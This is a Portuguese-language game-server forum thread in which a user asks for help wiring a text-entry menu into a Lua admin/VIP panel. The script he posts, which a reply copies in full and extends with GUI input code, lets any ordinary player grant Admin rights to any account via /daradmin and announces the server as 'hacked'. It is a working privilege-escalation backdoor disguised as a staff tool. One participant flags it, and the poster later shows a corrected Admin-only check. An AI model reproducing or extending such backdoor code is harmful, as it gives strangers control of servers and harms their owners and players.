King021 Posted January 17, 2021 Share Posted January 17, 2021 (edited) Quero fazer uma opcao quando o cara clica no botao do painel apareca um meno pra ele digitar um comando ..pra fazer script funciona dentro do painel dx,quando clica em dar vip aparece uma opcao pra ele digitar o login dele function givevip (playerSource, commandName, accountName) local accName = getAccountName ( getPlayerAccount ( playerSource ) ) if isObjectInACLGroup ("user."..accName, aclGetGroup ( "Everyone" ) ) then if accountName then aclGroupAddObject (aclGetGroup("Admin"), "user."..accountName) outputChatBox ("Conta '"..accountName.."'Server Hackeado com sucesso TROPA DO GALO", playerSource) else outputChatBox ("Nome incorreto", playerSource) outputChatBox ("Correto: /daradmin Login", playerSource) end end end addCommandHandler ("daradmin", givevip) Edited January 17, 2021 by King021 Link to comment
IGUINHO SCR Posted January 20, 2021 Share Posted January 20, 2021 On 17/01/2021 at 14:12, King021 said: iguinho_conta_player = guiCreateEdit( 562, 388, 231, 21, "Conta do player", false) -- ISSO CRIA A PARTE PARA ESCREVER NO PAINEL guiGetText(iguinho_conta_player) -- ESSE PEGA O QUE FOI ESCRITO function givevip (playerSource, commandName, accountName) local accName = getAccountName ( getPlayerAccount ( playerSource ) ) if isObjectInACLGroup ("user."..accName, aclGetGroup ( "Everyone" ) ) then if accountName then aclGroupAddObject (aclGetGroup("Admin"), "user."..accountName) outputChatBox ("Conta '"..accountName.."'Server Hackeado com sucesso TROPA DO GALO", playerSource) else outputChatBox ("Nome incorreto", playerSource) outputChatBox ("Correto: /daradmin Login", playerSource) end end end addCommandHandler ("daradmin", givevip) Link to comment
LucasST Posted January 21, 2021 Share Posted January 21, 2021 Nem vou responder, pois parece muito para utilização de Backdoor. '-' Link to comment
King021 Posted January 21, 2021 Author Share Posted January 21, 2021 11 minutes ago, LucasST said: Nem vou responder, pois parece muito para utilização de Backdoor. '-' kkk nao é mano esse script e pra setar pessoa nova que vai entrar na staff,peguei da net esse script ajuda ai Link to comment
King021 Posted January 21, 2021 Author Share Posted January 21, 2021 45 minutes ago, LucasST said: Nem vou responder, pois parece muito para utilização de Backdoor. '-' manoooooooooo. agr q eu vi o outputchatBox kkkkkkkkkk pqp foi mal eu tinha pegado esse script e so trocado os nome,antes tava assim.ai eu nem prestei atencao so tirei o CONEXAO VIDA ROLEPLAY pro nome do meu PAINEL kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk krl pqp agr q eu vi parece mt msm um mod menu essa porra. outputChatBox ("Conta '"..accountName.."'Server Hackeado com sucesso CONEXAO VIDA ROLEPLAY", playerSource) On 17/01/2021 at 14:12, King021 said: Quero fazer uma opcao quando o cara clica no botao do painel apareca um meno pra ele digitar um comando ..pra fazer script funciona dentro do painel dx,quando clica em dar vip aparece uma opcao pra ele digitar o login dele function givevip (playerSource, commandName, accountName) local accName = getAccountName ( getPlayerAccount ( playerSource ) ) if isObjectInACLGroup ("user."..accName, aclGetGroup ( "Admin" ) ) then if accountName then aclGroupAddObject (aclGetGroup("Admin"), "user."..accountName) outputChatBox ("Conta '"..accountName.."'Recebeu Admin", playerSource) else outputChatBox ("Nome incorreto", playerSource) outputChatBox ("Correto: /daradmin Login", playerSource) end end end addCommandHandler ("daradmin", givevip) meee agr q eu vi mano n tinha prestado atencao so queria termina o visual do painel e nem liguei pra esse script kkkk. ta cheio de bug resolvi mano era so uns bgl trocado krllllllllllllllllll nem vi foi maaaaaaaal mano pqp kkkkkkkkkkk minha cara agr Link to comment
Recommended Posts